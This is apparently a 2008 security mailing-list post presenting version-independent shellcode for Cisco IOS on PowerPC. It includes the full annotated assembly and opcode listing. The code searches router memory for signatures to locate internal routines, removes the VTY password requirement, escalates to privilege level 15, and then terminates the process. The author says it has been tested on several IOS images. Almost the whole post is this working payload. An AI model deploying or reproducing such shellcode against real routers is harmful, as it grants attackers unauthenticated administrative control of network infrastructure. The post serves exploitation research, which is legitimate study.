Hi,

One of the biggest problems with IOS exploitation is that on every
different version of IOS, the addresses required to execute useful
shellcode are different. Therefore, hard-coded addresses were inserted
into shellcode and this made exploits very version-dependent.

I have been working on a way around this and here is the first
iteration of just one of the solutions to the problem. It uses a
search routine to locate 4-byte signatures that occur near references
to the required addresses within the IOS image located in the "text"
memory region. The addresses are then recovered from memory and used
within the shellcode.

Cheers,

Andy

Version-independent IOS shellcode, Andy Davis 2008

No hard-coded IOS addresses required

The technique uses 4-byte signatures near references to the

required addresses within the IOS "text" memory region.

The addresses are then recovered from memory and used within the

shellcode.

This is beta 1 - this code can be highly optimised I'm sure,

for example, the search routine could be reused and the number

of registers cleared could be reduced - but it works :-)

As this is the first iteration of this shellcode, I'm not making any

claims as to exactly how portable it is - it has been tested on a

number of IOS images and therefore, the concept has been demonstrated.

Various simple techniques have been used to ensure that there are

no nulls in the shellcode

.equ sig_vty, 0x7F60B910 # signature for vty_info
.equ sig_kill, 0x639C8889 # signature for terminate()
.equ start, 0x80018001 # start of the search

3c 80 80 02 lis r4,-32766
38 84 80 01 addi r4,r4,-32767 # the start address for the search
3c a0 63 9d lis r5,25501
38 a5 88 89 addi r5,r5,-30583 # the "sig_kill" search signature
38 e7 01 94 addi r7,r7,404 # add 4 without introducing nulls
(technique used throughout the shellcode)
38 e7 fe 70 addi r7,r7,-400
7c c4 38 6e l1: lwzux r6,r4,r7
7c 06 28 40 cmplw r6,r5 # is address contents equal to signature
40 82 ff f8 bne 18 <l1> # no, keep searching
7c a5 2a 78 xor r5,r5,r5 # yes, found "sig_kill"
38 84 01 e8 addi r4,r4,488
38 84 fe 70 addi r4,r4,-400
7c c4 28 2e lwzx r6,r4,r5
38 a5 01 98 addi r5,r5,408
38 a5 fe 70 addi r5,r5,-400
7c c6 28 30 slw r6,r6,r5
7c c6 2c 30 srw r6,r6,r5
38 c6 ff ff addi r6,r6,-1 # r6 now contains the offset of
terminate() from here
7c 84 32 14 add r4,r4,r6 # add offset to current address
7c 8a 23 78 mr r10,r4 # address of terminate() saved into r10
7c e7 3a 78 xor r7,r7,r7
3c a0 7f 61 lis r5,32609
38 a5 b9 10 addi r5,r5,-18160 # the "sig_vty" search signature
38 e7 01 94 addi r7,r7,404
38 e7 fe 70 addi r7,r7,-400
7c c4 38 6e l2: lwzux r6,r4,r7
7c 06 28 40 cmplw r6,r5 # is address contents equal to signature
40 82 ff f8 bne 64 <l2> # no, keep searching
38 84 01 a8 addi r4,r4,424 # yes, found "sig_vty"
38 84 fe 70 addi r4,r4,-400
7c e7 3a 78 xor r7,r7,r7
7c a4 38 2e lwzx r5,r4,r7 # get two MSBs
38 a5 ff ff addi r5,r5,-1
7d 08 42 78 xor r8,r8,r8
39 08 01 a0 addi r8,r8,416
39 08 fe 70 addi r8,r8,-400
7c a5 40 30 slw r5,r5,r8 # shift MSBs into the right place (XXXX0000)
38 84 01 94 addi r4,r4,404
38 84 fe 70 addi r4,r4,-400
7c c4 38 2e lwzx r6,r4,r7 # get two LSBs
7c c6 40 30 slw r6,r6,r8
7c c6 44 30 srw r6,r6,r8 # shift LSBs to clear the MSBs (0000YYYY)
7c a5 32 14 add r5,r5,r6 # add the two together (XXXXYYYY)
38 a5 01 08 addi r5,r5,264 # move to the 66th element of the
array (VTY 0 - see IOS "systat" command)
7d 05 38 2e lwzx r8,r5,r7 # r8 = vty_info
90 e8 01 74 stw r7,372(r8) # Remove the requirement to enter a password
38 e7 ff ff addi r7,r7,-1
39 08 09 1a addi r8,r8,2330
90 e8 04 ca stw r7,1226(r8) # privilege escalate to level 15
7c e3 3b 78 mr r3,r7
7d 49 03 a6 mtctr r10
4e 80 04 20 bctr # terminate "this process"